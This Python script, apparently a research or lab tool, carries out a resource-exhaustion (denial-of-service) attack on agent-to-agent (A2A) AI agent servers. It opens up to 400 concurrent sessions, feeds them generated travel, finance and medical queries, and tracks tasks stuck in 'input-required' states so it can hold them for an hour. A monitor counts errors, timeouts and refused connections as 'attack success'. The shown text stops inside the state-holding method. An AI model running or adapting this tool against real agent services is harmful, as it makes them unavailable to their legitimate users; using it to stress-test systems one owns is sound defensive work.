"""
A2A Input-Required State Occupation Attack with Continuous Pressure Testing Logic
Multi-scenario support for Travel, Finance, and Medical domains
Added attack success detection mechanism after 60 seconds
"""

import asyncio
import json
import time
import uuid
import statistics
import argparse
from typing import List, Dict, Any, Optional
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass, field
import httpx
import threading
from collections import defaultdict, deque
import signal
import sys
from enum import Enum

class ScenarioType(Enum):
    TRAVEL = "Travel"
    FINANCE = "Finance"
    MEDICAL = "Medical"

@dataclass
class PressureTestMetrics:
    """Pressure test metrics"""
    total_requests: int = 0
    successful_requests: int = 0
    failed_requests: int = 0
    input_required_triggered: int = 0
    internal_errors: int = 0
    response_times: List[float] = field(default_factory=list)
    concurrent_input_required_states: int = 0
    max_concurrent_states: int = 0
    error_codes: Dict[int, int] = field(default_factory=lambda: defaultdict(int))
    
    # Service denial related metrics
    connection_refused_count: int = 0
    timeout_count: int = 0
    server_overload_indicators: int = 0
    
    # Attack success detection metrics
    attack_success_tests: int = 0
    attack_success_count: int = 0
    
    def add_response_time(self, time_ms: float):
        self.response_times.append(time_ms)
        # Keep only the latest 1000 response times to save memory
        if len(self.response_times) > 1000:
            self.response_times = self.response_times[-1000:]
    
    def get_avg_response_time(self) -> float:
        return statistics.mean(self.response_times) if self.response_times else 0
    
    def get_p95_response_time(self) -> float:
        if not self.response_times:
            return 0
        return statistics.quantiles(self.response_times, n=20)[18]  # 95th percentile

@dataclass
class AttackConfig:
    """Attack configuration"""
    target_host: str = "localhost"
    target_port: int = 10001
    scenario: ScenarioType = ScenarioType.TRAVEL
    
    # Continuous pressure test parameters
    max_concurrent_sessions: int = 400  # Increased to 400 concurrent sessions
    ramp_up_duration: int = 30  # Pressure ramp-up time (seconds)
    continuous_mode: bool = True  # Continuous mode
    
    # Attack success detection parameters
    attack_test_start_time: int = 60  # Start testing after 60 seconds
    attack_test_interval: int = 30   # Test every 30 seconds
    attack_test_timeout: float = 5.0  # Test request timeout
    
    # Input-Required occupation parameters
    max_input_required_per_session: int = -1  # -1 means unlimited
    input_required_hold_time: int = 3600  # Hold for 1 hour
    
    # Request parameters
    request_timeout: float = 3.0  # Reduced timeout for increased pressure
    retry_attempts: int = 1  # Reduced retry attempts
    min_request_interval: float = 0.01  # Minimum request interval 10ms
    
    # Monitoring parameters
    metrics_interval: int = 10  # Metrics reporting interval (seconds)
    
    # Session restart parameters
    session_restart_threshold: int = 1000  # Restart session after this many requests
    failed_session_restart_delay: float = 1.0  # Failed session restart delay

class QueryGenerator:
    """Query generator for different scenarios"""
    
    @staticmethod
    def generate_travel_query(session_id: str, request_count: int) -> str:
        """Generate hotel search queries"""
        queries = [
            f"Find hotels under ${50 + request_count * 10} in Tokyo for {request_count} guests",
            f"Show me luxury hotels in Paris with rating above {4 + (request_count % 10) * 0.1}",
            f"Budget accommodations in Bangkok under ${30 + request_count * 5} near airport",
            f"5-star hotels in New York near Central Park with {request_count} rooms",
            f"Hotels with spa services in Bali for vacation booking #{request_count}",
            f"Pet-friendly hotels in San Francisco allowing {request_count % 5 + 1} pets",
            f"Business hotels near airport in London with conference room #{request_count}",
            f"Boutique hotels in Rome city center, booking reference {request_count}",
            f"Hotels with swimming pool in Miami, guest count {request_count}",
            f"Family resorts in Hawaii under ${200 + request_count * 20}, reservation {request_count}",
            f"Historic hotels in Prague for {request_count} night stay",
            f"Eco-friendly accommodations in Costa Rica, booking #{request_count}",
            f"Hotels with conference rooms in Singapore capacity {request_count * 10}",
            f"Beachfront resorts in Maldives for honeymoon #{request_count}",
            f"Mountain view hotels in Switzerland, group size {request_count % 20 + 1}",
            f"Hotels with restaurant in Barcelona, dinner reservation #{request_count}",
            f"Multi-city hotel search: Tokyo-Paris-London for business trip #{request_count}",
            f"Luxury hotel comparison in top {request_count % 10 + 5} destinations worldwide",
            f"Budget vs premium hotel analysis for vacation #{request_count}",
            f"Hotel availability check for conference with {request_count * 50} attendees",
            f"Ryokans with onsen in Kyoto for {request_count} guests",
            f"All-inclusive resorts in Cancun under ${150 + request_count * 15} for {request_count} nights",
            f"Business hotels in Seoul near COEX with {request_count} meeting rooms",
            f"Ski-in/ski-out lodges in Hokkaido accommodating {request_count} snowboarders",
            f"Desert resorts in Dubai with {request_count} complimentary spa passes",
            f"Safari lodges in Kenya for group size {request_count % 12 + 2}",
            f"Lakeside hotels in Queenstown with {request_count} adventure activities included",
            f"Boutique riads in Marrakech for {request_count} night stay",
            f"Serviced apartments in Hong Kong with {request_count} bedrooms",
            f"Hotels with free breakfast in Toronto for {request_count} guests",
            f"EV-charging hotels in Oslo with {request_count} parking spots",
            f"Airport shuttle hotels in Kuala Lumpur for flight #{request_count}",
            f"Conference venues in Shanghai for {request_count * 20} participants",
            f"Wellness retreats in Ubud with yoga classes #{request_count}",
            f"Ocean-view suites in Sydney for {request_count} nights under ${120 + request_count * 10}",
            f"Budget hostels in Hanoi under ${15 + request_count * 2} per night for {request_count} travelers",
            f"Wine-country inns in Napa with a {request_count}-course tasting menu",
            f"Art hotels in Mexico City with late checkout at {12 + (request_count % 5)}:00",
            f"Family-friendly hotels in Orlando with {request_count} park shuttle passes",
            f"Riverfront hotels on the Shanghai Bund with {request_count} rooms",
            f"Mountain lodges in Banff with {request_count} ski passes included",
            f"Seaview villas in Phuket for {request_count} adults",
            f"Overwater bungalows in Bora Bora for honeymoon #{request_count}",
            f"Historic riads in Fes with {request_count} rooftop tables reserved",
            f"Design hotels in Copenhagen with {request_count} bike rentals",
            f"Business hotels in Frankfurt near Messe for booth #{request_count}",
            f"Spa hotels in Budapest with thermal bath access for {request_count} guests",
            f"Pet-friendly cabins in Lake Tahoe allowing {request_count % 3 + 1} pets",
            f"Eco-lodges in Patagonia with carbon offset of {request_count * 10} kg",
            f"Beach hotels in Goa under ${60 + request_count * 4} for {request_count} guests",
            f"Rainforest lodges in Costa Rica with {request_count} guided tours",
            f"Rooftop pool hotels in Dubai Marina for {request_count} nights",
            f"Music-themed hotels in Nashville near Broadway for group of {request_count}",
            f"Theater district hotels in London with {request_count} show tickets",
            f"Casino hotels in Macau for {request_count} guests under ${100 + request_count * 8}",
            f"River cruise hotel packages in Amsterdam for {request_count} nights",
            f"Castle stays in Scotland for {request_count} guests",
            f"Ice hotels in Swedish Lapland for {request_count} nights",
            f"Golf resorts in Palm Springs with tee time #{request_count}",
            f"Ski chalets in Zermatt for {request_count} people",
            f"City center hotels in Zurich with {request_count} breakfast vouchers",
            f"Business hotels in Jakarta near SCBD for {request_count} rooms",
            f"Spa resorts on Jeju Island with {request_count} sauna entries",
            f"Beachfront hotels in Da Nang under ${40 + request_count * 3} for {request_count} nights",
            f"Heritage hotels in Jaipur for wedding group size {request_count * 5}",
            f"Safari camps in Serengeti with {request_count} game drives",
            f"Wellness hotels in Chiang Mai offering {request_count} massage sessions",
            f"River-view hotels in Ho Chi Minh City with {request_count} river-view rooms",
            f"Minimalist design hotels in Taipei with {request_count} workspaces",
            f"Opera district hotels in Paris with {request_count} lounge access passes",
            f"Seaside inns in Cornwall for {request_count} nights including breakfast",
            f"Lake-view hotels in Geneva with {request_count} meeting hours",
            f"Nature lodges in Sapa with {request_count} trekking permits",
            f"Cave hotels in Cappadocia with {request_count} balloon ride slots",
            f"Mediterranean resorts in Santorini with {request_count} sunset dinners",
            f"Business hotels in Tel Aviv with {request_count} Mbps Wi-Fi",
            f"Desert camp hotels in Wadi Rum with {request_count} stargazing sessions",
            f"Luxury riads in Chefchaouen for {request_count} guests",
            f"Vineyard stays in Tuscany with {request_count} winery tours",
            f"Surf hotels in Bali with {request_count} lesson credits",
            f"Island resorts in Seychelles under ${180 + request_count * 12} for {request_count} nights",
            f"City view hotels in Kuala Lumpur near Petronas Towers for {request_count} guests",
            f"Thermal spa hotels in Reykjavik with {request_count} lagoon passes",
            f"Business hotels in Shenzhen near Convention Center with {request_count} workstations",
            f"Boutique hotels in Lisbon with {request_count} pastry vouchers",
            f"Riverfront hotels in Brisbane with {request_count} rooms and late checkout",
            f"Mountain cabins in Yosemite for group size {request_count % 10 + 2}",
            f"Waterfront hotels in Seattle with {request_count} ferry tickets",
            f"Harborview hotels in Hong Kong with {request_count} lounge entries",
            f"Theater hotels in Vienna near Staatsoper for {request_count} nights",
            f"Jazz-themed hotels in New Orleans with {request_count} club entries",
            f"Safari lodges in Kruger with {request_count} morning drives",
            f"Art deco hotels in Miami Beach with {request_count} sunbeds reserved",
            f"Aurora-view hotels in Tromso with {request_count} wake-up calls",
            f"Colonial hotels in Havana for {request_count} guests",
            f"River-view ryokans in Arashiyama with {request_count} tatami rooms",
            f"Capsule hotels in Osaka for {request_count} travelers",
            f"Ski resorts in Aspen with {request_count} lift tickets",
            f"Lakeside hotels in Lucerne with {request_count} boat passes",
            f"Business hotels in Gurgaon near Cyber City with {request_count} rooms"
        ]
        return queries[request_count % len(queries)]
    
    @staticmethod
    def generate_finance_query(session_id: str, request_count: int) -> str:
        """Generate financial client search queries"""
        queries = [
            f"Find investment clients with portfolio value over ${request_count * 100000} in New York",
            f"Search for high-net-worth clients interested in {request_count % 5 + 1} year bonds",
            f"Locate corporate clients needing loan amount ${request_count * 50000} for expansion",
            f"Find retirement planning clients aged {50 + request_count % 20} with ${request_count * 10000} assets",
            f"Search for forex trading clients with daily volume ${request_count * 1000}",
            f"Identify clients interested in cryptocurrency investment portfolio #{request_count}",
            f"Find insurance clients seeking coverage amount ${request_count * 25000}",
            f"Locate mortgage clients with income ${request_count * 5000} monthly",
            f"Search for business loan clients in sector #{request_count % 10}",
            f"Find wealth management clients with liquid assets ${request_count * 75000}",
            f"Identify tax planning clients with annual income ${request_count * 8000}",
            f"Search for estate planning clients with net worth ${request_count * 200000}",
            f"Find credit card clients with spending limit ${request_count * 1000}",
            f"Locate investment advisory clients seeking {request_count % 3 + 1}% returns",
            f"Search for private banking clients with deposits ${request_count * 150000}",
            f"Find corporate treasury clients managing ${request_count * 500000} cash flow",
            f"Identify derivatives trading clients with risk tolerance level {request_count % 5 + 1}",
            f"Search for pension fund clients with {request_count * 10} beneficiaries",
            f"Find structured products clients interested in {request_count % 4 + 1} year terms",
            f"Locate compliance clients needing regulatory reporting for {request_count} transactions",
            f"Find ETF investors allocating ${request_count * 20000} to index funds",
            f"Search for mutual fund clients with monthly SIP ${request_count * 500}",
            f"Locate bond ladder clients building {request_count % 7 + 3}-rung portfolios",
            f"Identify options traders with margin balance ${request_count * 12000}",
            f"Find futures trading clients with contract size {request_count * 5}",
            f"Search for commodities clients hedging {request_count * 100} barrels",
            f"Locate REIT investors targeting yield {2 + (request_count % 5) * 0.5}%",
            f"Identify hedge fund clients with AUM ${request_count * 1000000}",
            f"Find angel investors committing ${request_count * 25000} per deal",
            f"Search for venture capital clients with fund size ${request_count * 5000000}",
            f"Locate private equity clients seeking IRR {8 + (request_count % 7)}%",
            f"Identify family offices with discretionary mandate ${request_count * 2000000}",
            f"Find sovereign clients bidding ${request_count * 10000000} in T-bills",
            f"Search for corporate bond issuers planning ${request_count * 1000000} issuance",
            f"Locate green bond investors targeting tenor {request_count % 10 + 3} years",
            f"Identify ESG-focused clients with score threshold {60 + request_count % 40}",
            f"Find wealth clients interested in tax-loss harvesting amount ${request_count * 3000}",
            f"Search for robo-advisory clients with risk profile {request_count % 5 + 1}",
            f"Locate brokerage clients placing {request_count * 2} trades per week",
            f"Identify custody clients holding ${request_count * 400000} in assets",
            f"Find treasury clients investing ${request_count * 100000} in commercial paper",
            f"Search for FX hedging clients with notional ${request_count * 200000}",
            f"Locate cross-border payment clients sending ${request_count * 15000} monthly",
            f"Identify remittance clients with corridor #{request_count % 12}",
            f"Find merchant acquiring clients with monthly GMV ${request_count * 80000}",
            f"Search for payment gateway clients with {request_count * 1000} daily transactions",
            f"Locate BNPL merchants needing credit line ${request_count * 70000}",
            f"Identify invoice financing clients with receivables ${request_count * 90000}",
            f"Find trade finance clients requiring LC amount ${request_count * 120000}",
            f"Search for supply chain finance clients with DPO {60 + request_count % 60} days",
            f"Locate factoring clients discounting ${request_count * 110000} invoices",
            f"Identify escrow service clients holding ${request_count * 600000}",
            f"Find IPO subscription clients applying ${request_count * 30000}",
            f"Search for SPAC investors with warrant count {request_count * 10}",
            f"Locate M&A advisory clients targeting deal size ${request_count * 5000000}",
            f"Identify corporate FX clients with {request_count * 3} currency pairs",
            f"Find derivatives clearing clients with margin requirement ${request_count * 130000}",
            f"Search for OTC swap clients with notional ${request_count * 2000000}",
            f"Locate interest rate hedging clients for {request_count % 10 + 1}-year swaps",
            f"Identify asset-backed securities investors buying ${request_count * 350000}",
            f"Find mortgage-backed securities clients with tranche count {request_count % 5 + 2}",
            f"Search for structured note clients targeting payoff level {request_count % 4 + 1}",
            f"Locate wealth clients requesting periodic rebalancing every {request_count % 6 + 1} months",
            f"Identify discretionary portfolio clients with fee rate {0.5 + (request_count % 10) * 0.1}%",
            f"Find advisory-only clients with households {request_count * 3}",
            f"Search for retirement annuity clients contributing ${request_count * 400}",
            f"Locate 401(k) rollover clients with balance ${request_count * 45000}",
            f"Identify HSA clients contributing ${request_count * 200} monthly",
            f"Find education savings clients funding ${request_count * 300} per month",
            f"Search for philanthropic clients with donor-advised funds ${request_count * 75000}",
            f"Locate trust services clients establishing ${request_count * 250000} trusts",
            f"Identify estate settlement clients with assets ${request_count * 900000}",
            f"Find tax-exempt clients purchasing muni bonds ${request_count * 80000}",
            f"Search for money market clients allocating ${request_count * 60000}",
            f"Locate liquidity management clients with sweep amount ${request_count * 220000}",
            f"Identify cash management clients maintaining ${request_count * 500000} average balance",
            f"Find credit risk clients with PD {0.5 + (request_count % 25) * 0.1}%",
            f"Search for AML monitoring clients with {request_count * 20} alerts",
            f"Locate KYC remediation clients for {request_count * 5} records",
            f"Identify regulatory reporting clients filing {request_count * 12} reports annually",
            f"Find Basel III clients optimizing CET1 ratio {8 + (request_count % 5)}%",
            f"Search for IFRS 9 clients staging {request_count % 3 + 1} assets",
            f"Locate stress testing clients running {request_count % 4 + 1} scenarios",
            f"Identify capital markets clients issuing ${request_count * 7000000} equity",
            f"Find prime brokerage clients with short interest ${request_count * 140000}",
            f"Search for securities lending clients borrowing ${request_count * 160000}",
            f"Locate collateral management clients pledging ${request_count * 180000}",
            f"Identify repo clients transacting ${request_count * 220000}",
            f"Find wealth clients scheduling {request_count % 12 + 1} reviews per year",
            f"Search for credit card clients with rewards multiplier {request_count % 4 + 1}x",
            f"Locate personal loan clients requesting ${request_count * 15000}",
            f"Identify auto loan clients financing ${request_count * 20000}",
            f"Find SME loan clients with turnover ${request_count * 300000}",
            f"Search for project finance clients needing capex ${request_count * 10000000}",
            f"Locate infrastructure finance clients with tenor {request_count % 20 + 5} years",
            f"Identify ship finance clients requiring ${request_count * 8000000}",
            f"Find aircraft finance clients leasing ${request_count * 12000000} assets",
            f"Search for microfinance clients seeking ${request_count * 500} loans",
            f"Locate credit line clients with limit ${request_count * 40000}",
            f"Identify overdraft clients with facility ${request_count * 20000}"
        ]
        return queries[request_count % len(queries)]
    
    @staticmethod
    def generate_medical_query(session_id: str, request_count: int) -> str:
        """Generate doctor search queries"""
        queries = [
            f"Find cardiologists in Boston with {request_count % 20 + 5} years experience",
            f"Search for orthopedic surgeons specializing in knee replacement, patient #{request_count}",
            f"Locate pediatricians accepting new patients under age {request_count % 15 + 1}",
            f"Find dermatologists with expertise in skin cancer, case #{request_count}",
            f"Search for neurologists treating migraine patients, appointment #{request_count}",
            f"Identify psychiatrists with availability for {request_count % 7 + 1} sessions weekly",
            f"Find oncologists specializing in stage {request_count % 4 + 1} cancer treatment",
            f"Locate emergency medicine doctors on shift #{request_count}",
            f"Search for radiologists with MRI interpretation experience, scan #{request_count}",
            f"Find general practitioners in rural areas, patient load {request_count * 10}",
            f"Identify anesthesiologists for surgery scheduled #{request_count}",
            f"Search for gastroenterologists with endoscopy availability, procedure #{request_count}",
            f"Find pulmonologists treating respiratory conditions, case #{request_count}",
            f"Locate rheumatologists specializing in arthritis, patient #{request_count}",
            f"Search for ophthalmologists performing cataract surgery #{request_count}",
            f"Find endocrinologists managing diabetes patients, HbA1c {6.5 + (request_count % 20) * 0.1}",
            f"Identify infectious disease specialists for outbreak case #{request_count}",
            f"Search for pathologists for biopsy analysis, specimen #{request_count}",
            f"Find plastic surgeons with reconstruction experience, consultation #{request_count}",
            f"Locate geriatricians caring for patients aged {70 + request_count % 25}",
            f"Find obstetricians/gynecologists in Los Angeles accepting patients at {request_count % 30 + 1} weeks gestation",
            f"Search for urologists treating kidney stones, case #{request_count}",
            f"Locate nephrologists scheduling dialysis slots {request_count % 10 + 1} per week",
            f"Find hepatologists managing cirrhosis, MELD {10 + request_count % 20}",
            f"Identify hematologists for anemia workup, referral #{request_count}",
            f"Search for immunologists evaluating recurrent infections, visit #{request_count}",
            f"Locate allergists providing skin prick tests for {request_count % 8 + 2} allergens",
            f"Find cardiothoracic surgeons for CABG surgery #{request_count}",
            f"Identify vascular surgeons with case volume {request_count % 50 + 10} per year",
            f"Search for otolaryngologists (ENT) for sinus surgery #{request_count}",
            f"Locate oral and maxillofacial surgeons for jaw surgery #{request_count}",
            f"Find orthopedic hand surgeons for carpal tunnel release #{request_count}",
            f"Search for sports medicine physicians for {request_count % 3 + 1} ligament injuries",
            f"Locate physiatry (PM&R) doctors for rehabilitation sessions {request_count % 12 + 4}",
            f"Find pain management specialists offering {request_count % 6 + 1} epidural injections",
            f"Identify bariatric surgeons for BMI {30 + request_count % 15}",
            f"Search for endocrinologists treating thyroid nodules size {request_count % 30 + 5} mm",
            f"Locate diabetologists adjusting insulin {request_count % 40 + 10} units daily",
            f"Find nephrologists managing eGFR {90 - request_count % 60} mL/min/1.73m²",
            f"Identify pulmonologists interpreting PFT FEV1 {50 + request_count % 50}%",
            f"Search for cardiologists performing echocardiograms #{request_count}",
            f"Locate interventional cardiologists for stent placement #{request_count}",
            f"Find neurologists specializing in epilepsy with {request_count % 5 + 1} EMU beds",
            f"Identify neurosurgeons for lumbar discectomy #{request_count}",
            f"Search for dermatologists offering Mohs surgery slots {request_count % 4 + 1} weekly",
            f"Locate ophthalmologists for glaucoma management, IOP {12 + request_count % 20} mmHg",
            f"Find optometrists providing refraction for {request_count * 2} patients daily",
            f"Identify otologists treating hearing loss, audiogram #{request_count}",
            f"Search for pediatric cardiologists handling CHD case #{request_count}",
            f"Locate neonatologists for NICU capacity {request_count % 20 + 5} beds",
            f"Find perinatologists for high-risk pregnancy case #{request_count}",
            f"Identify fertility specialists with IVF success rate {40 + request_count % 30}%",
            f"Search for genetic counselors scheduling {request_count % 6 + 1} sessions weekly",
            f"Locate psychiatrists for ADHD evaluations, intake #{request_count}",
            f"Find clinical psychologists providing CBT for {request_count % 12 + 4} weeks",
            f"Identify gastroenterologists with IBD flare level {request_count % 4 + 1}",
            f"Search for hepatobiliary surgeons for liver resection #{request_count}",
            f"Locate transplant surgeons for kidney transplant waitlist position {request_count % 200 + 1}",
            f"Find infectious disease doctors for antimicrobial stewardship rounds #{request_count}",
            f"Identify endocrinologists for osteoporosis, DEXA T-score {-2.0 - (request_count % 10) * 0.1}",
            f"Search for pulmonologists for sleep apnea, AHI {request_count % 50 + 5}",
            f"Locate sleep medicine specialists conducting {request_count % 10 + 1} polysomnographies weekly",
            f"Find radiologists for CT scans with contrast, scan #{request_count}",
            f"Identify interventional radiologists for image-guided biopsy #{request_count}",
            f"Search for nuclear medicine physicians interpreting PET-CT #{request_count}",
            f"Locate radiation oncologists planning IMRT fractions {request_count % 30 + 10}",
            f"Find medical oncologists administering chemotherapy cycle #{request_count}",
            f"Identify palliative care physicians for {request_count % 14 + 1}-day symptom control plan",
            f"Search for dermatologists treating psoriasis, PASI {request_count % 30 + 1}",
            f"Locate rheumatologists managing SLE with {request_count % 3 + 1} immunosuppressants",
            f"Find nephrologists for transplant rejection biopsy, specimen #{request_count}",
            f"Identify cardiologists for Holter monitoring duration {request_count % 4 + 1} days",
            f"Search for electrophysiologists performing ablation #{request_count}",
            f"Locate endocrinologists for adrenal incidentaloma size {request_count % 40 + 10} mm",
            f"Find gastroenterologists evaluating GERD with pH score {request_count % 14 + 1}",
            f"Identify hepatologists treating hepatitis, viral load {request_count * 1000} IU/mL",
            f"Search for hematologists managing platelet count {100 + request_count % 300}k/µL",
            f"Locate oncologists for tumor board case #{request_count}",
            f"Find endocrinologists for pituitary adenoma, prolactin {request_count % 150 + 10} ng/mL",
            f"Identify neurologists for stroke door-to-needle under {30 + request_count % 30} minutes",
            f"Search for emergency physicians with triage capacity {request_count * 3} patients/hour",
            f"Locate intensivists (ICU) for ventilator count {request_count % 25 + 5}",
            f"Find nephrologists prescribing CRRT dose {25 + request_count % 15} mL/kg/h",
            f"Identify cardiologists reading stress test METs {7 + request_count % 10}",
            f"Search for pulmonologists assessing DLCO {40 + request_count % 60}%",
            f"Locate endocrinologists adjusting basal insulin {request_count % 40 + 10} units",
            f"Find dietitians managing calorie plan {1200 + request_count * 5} kcal/day",
            f"Identify speech therapists for {request_count % 10 + 1} dysphagia sessions",
            f"Search for orthopedic spine surgeons performing fusion level {request_count % 4 + 1}",
            f"Locate trauma surgeons on call #{request_count}",
            f"Find hand surgeons for tendon repair case #{request_count}",
            f"Identify plastic surgeons for cleft palate repair #{request_count}",
            f"Search for pediatricians scheduling vaccination dose #{request_count % 5 + 1}",
            f"Locate family physicians offering telemedicine slots {request_count % 12 + 1} daily",
            f"Find dermatologists for acne severity grade {request_count % 4 + 1}",
            f"Identify ophthalmologists for diabetic retinopathy stage {request_count % 5 + 1}",
            f"Search for cardiologists in Chicago with wait time under {request_count % 14 + 1} days",
            f"Locate geriatricians managing polypharmacy {request_count % 12 + 3} medications",
            f"Find psychiatrists for depression, PHQ-9 score {request_count % 27}",
            f"Identify neurologists for Parkinson's ON/OFF evaluation duration {request_count % 3 + 1} hours"
        ]
        return queries[request_count % len(queries)]
    
    @staticmethod
    def get_test_query(scenario: ScenarioType) -> str:
        """Get a simple test query for attack success detection"""
        test_queries = {
            ScenarioType.TRAVEL: "Find available hotels in New York for tonight",
            ScenarioType.FINANCE: "Search for investment opportunities with low risk",
            ScenarioType.MEDICAL: "Find general practitioners accepting new patients"
        }
        return test_queries.get(scenario, "Simple test query")

class A2AInputRequiredStateOccupationAttacker:
    """A2A Input-Required State Occupation Attacker"""
    
    def __init__(self, config: AttackConfig):
        self.config = config
        self.base_url = f"http://{config.target_host}:{config.target_port}"
        self.metrics = PressureTestMetrics()
        self.active_sessions: Dict[str, Dict] = {}
        self.session_lock = threading.Lock()
        self.attack_start_time = 0
        self.attack_active = False
        self.shutdown_requested = False
        
        # Track input-required states
        self.input_required_sessions = {}
        self.state_hold_tasks = []
        
        # Attack success detection
        self.attack_test_active = False
        
        # Setup signal handlers
        signal.signal(signal.SIGINT, self._signal_handler)
        signal.signal(signal.SIGTERM, self._signal_handler)
        
    def _signal_handler(self, signum, frame):
        """Signal handler"""
        print(f"\n🛑 Received stop signal {signum}, gracefully shutting down...")
        self.shutdown_requested = True
        self.attack_active = False
        
    async def create_http_client(self) -> httpx.AsyncClient:
        """Create HTTP client"""
        return httpx.AsyncClient(
            timeout=httpx.Timeout(self.config.request_timeout),
            limits=httpx.Limits(max_connections=500, max_keepalive_connections=100),
            # Increased connection pool size for higher concurrency
        )
    
    async def create_test_client(self) -> httpx.AsyncClient:
        """Create HTTP client for attack success testing"""
        return httpx.AsyncClient(
            timeout=httpx.Timeout(self.config.attack_test_timeout),
            limits=httpx.Limits(max_connections=10, max_keepalive_connections=5),
        )
    
    def generate_query(self, session_id: str, request_count: int) -> str:
        """Generate query based on scenario"""
        if self.config.scenario == ScenarioType.TRAVEL:
            return QueryGenerator.generate_travel_query(session_id, request_count)
        elif self.config.scenario == ScenarioType.FINANCE:
            return QueryGenerator.generate_finance_query(session_id, request_count)
        elif self.config.scenario == ScenarioType.MEDICAL:
            return QueryGenerator.generate_medical_query(session_id, request_count)
        else:
            return QueryGenerator.generate_travel_query(session_id, request_count)
    
    async def send_a2a_request(self, client: httpx.AsyncClient, session_data: Dict) -> Optional[Dict]:
        """Send A2A request"""
        message_id = str(uuid.uuid4())
        
        # Generate query content
        query_text = session_data.get("query_override") or self.generate_query(
            session_data["session_id"], 
            session_data["request_count"]
        )
        
        payload = {
            "jsonrpc": "2.0",
            "id": session_data["request_count"],
            "method": "message/send",
            "params": {
                "message": {
                    "role": "user",
                    "parts": [
                        {
                            "kind": "text",
                            "text": query_text
                        }
                    ],
                    "messageId": message_id,
                    "contextId": session_data["context_id"],
                    "kind": "message"
                }
            }
        }
        
        # Add taskId and referenceTaskIds if continuing a task
        if session_data.get("task_id"):
            payload["params"]["message"]["taskId"] = session_data["task_id"]
            payload["params"]["message"]["referenceTaskIds"] = [session_data["task_id"]]
        
        start_time = time.time()
        
        try:
            response = await client.post(
                self.base_url,
                json=payload,
                headers={"Content-Type": "application/json"}
            )
            
            response_time = (time.time() - start_time) * 1000
            self.metrics.add_response_time(response_time)
            self.metrics.total_requests += 1
            
            # Detect server overload indicators
            if response_time > 10000:  # Response time over 10 seconds
                self.metrics.server_overload_indicators += 1
            
            if response.status_code == 200:
                result = response.json()
                
                if "result" in result:
                    self.metrics.successful_requests += 1
                    return result["result"]
                elif "error" in result:
                    error = result["error"]
                    self.metrics.error_codes[error["code"]] += 1
                    self.metrics.failed_requests += 1
                    
                    if error["code"] == -32603:
                        self.metrics.internal_errors += 1
                    
                    return {"error": error}
            elif response.status_code == 503:  # Service Unavailable
                self.metrics.server_overload_indicators += 1
                self.metrics.failed_requests += 1
                return {"error": "Service Unavailable"}
            else:
                self.metrics.failed_requests += 1
                return None
                
        except httpx.ConnectError:
            self.metrics.connection_refused_count += 1
            self.metrics.failed_requests += 1
            response_time = (time.time() - start_time) * 1000
            self.metrics.add_response_time(response_time)
            return {"error": "Connection Refused"}
        except httpx.TimeoutException:
            self.metrics.timeout_count += 1
            self.metrics.failed_requests += 1
            response_time = (time.time() - start_time) * 1000
            self.metrics.add_response_time(response_time)
            return {"error": "Timeout"}
        except Exception as e:
            self.metrics.failed_requests += 1
            response_time = (time.time() - start_time) * 1000
            self.metrics.add_response_time(response_time)
            return {"error": str(e)}
    
    async def test_attack_success(self) -> int:
        """Test if attack is successful (node unable to respond normally)
        Returns: 1 if attack successful, 0 if not successful"""
        
        test_client = await self.create_test_client()
        test_query = QueryGenerator.get_test_query(self.config.scenario)
        
        try:
            # Create a simple test request
            test_payload = {
                "jsonrpc": "2.0",
                "id": "attack_test",
                "method": "message/send",
                "params": {
                    "message": {
                        "role": "user",
                        "parts": [
                            {
                                "kind": "text",
                                "text": test_query
                            }
                        ],
                        "messageId": str(uuid.uuid4()),
                        "contextId": str(uuid.uuid4()),
                        "kind": "message"
                    }
                }
            }
            
            start_time = time.time()
            response = await test_client.post(
                self.base_url,
                json=test_payload,
                headers={"Content-Type": "application/json"}
            )
            response_time = (time.time() - start_time) * 1000
            
            # Check if the response indicates the node is unable to work normally
            if response.status_code == 200:
                try:
                    result = response.json()
                    
                    # Check for error responses that indicate service degradation
                    if "error" in result:
                        error_code = result["error"].get("code", 0)
                        error_message = result["error"].get("message", "").lower()
                        
                        # Consider these as attack success indicators
                        if (error_code == -32603 or  # Internal error
                            "timeout" in error_message or
                            "overload" in error_message or
                            "unavailable" in error_message or
                            "busy" in error_message):
                            return 1  # Attack successful
                    
                    # Check for extremely slow response (over 10 seconds)
                    if response_time > 10000:
                        return 1  # Attack successful
                        
                    # If we get a normal result, attack is not successful
                    if "result" in result:
                        return 0  # Attack not successful
                        
                except json.JSONDecodeError:
                    # Invalid JSON response indicates service degradation
                    return 1  # Attack successful
                    
            elif response.status_code in [503, 502, 504, 500]:
                # Service unavailable, bad gateway, gateway timeout, internal server error
                return 1  # Attack successful
            else:
                return 0  # Attack not successful
                
        except httpx.ConnectError:
            # Connection refused indicates service is down
            return 1  # Attack successful
        except httpx.TimeoutException:
            # Timeout indicates service is overloaded
            return 1  # Attack successful
        except Exception as e:
            # Other exceptions may indicate service issues
            print(f"🔍 Attack test exception: {e}")
            return 1  # Attack successful
        finally:
            await test_client.aclose()
        
        return 0  # Default: attack not successful
    
    async def attack_success_monitor(self):
        """Monitor and test attack success periodically"""
        # Wait for the initial test time
        await asyncio.sleep(self.config.attack_test_start_time)
        
        if self.shutdown_requested:
            return
        
        print(f"\n🔍 Starting attack success detection after {self.config.attack_test_start_time}s")
        self.attack_test_active = True
        
        while self.attack_active and not self.shutdown_requested:
            self.metrics.attack_success_tests += 1
            
            print(f"🧪 Performing attack success test #{self.metrics.attack_success_tests}...")
            
            success_result = await self.test_attack_success()
            
            if success_result == 1:
                self.metrics.attack_success_count += 1
                print(f"✅ Attack Success Test #{self.metrics.attack_success_tests}: SUCCESS (1) - Node appears to be under stress/unable to respond normally")
            else:
                print(f"❌ Attack Success Test #{self.metrics.attack_success_tests}: FAILED (0) - Node is responding normally")
            
            # Wait for next test
            await asyncio.sleep(self.config.attack_test_interval)
    
    async def handle_input_required_state(self, session_data: Dict, task_data: Dict):
        """Handle input-required state, maintain occupation"""
        if task_data.get("status", {}).get("state") == "input-required":
            self.metrics.input_required_triggered += 1
            self.metrics.concurrent_input_required_states += 1
            self.metrics.max_concurrent_states = max(
                self.metrics.max_concurrent_states,
                self.metrics.concurrent_input_required_states
            )
            
            session_id = session_data["session_id"]
            task_id = task_data["id"]
            
            print(f"🎯 Session {session_id} successfully triggered input-required state! TaskID: {task_id}")
            
            # Save input-required state information
            self.input_required_sessions[session_id] = {
                "task_id": task_id,
                "context_id": task_data["contextId"],
                "start_time": time.time(),
                "hold_until": time.time() + self.config.input_required_hold_time
            }
            
            # Update session data
            session_data["task_id"] = task_id
            session_data["context_id"] = task_data["contextId"]
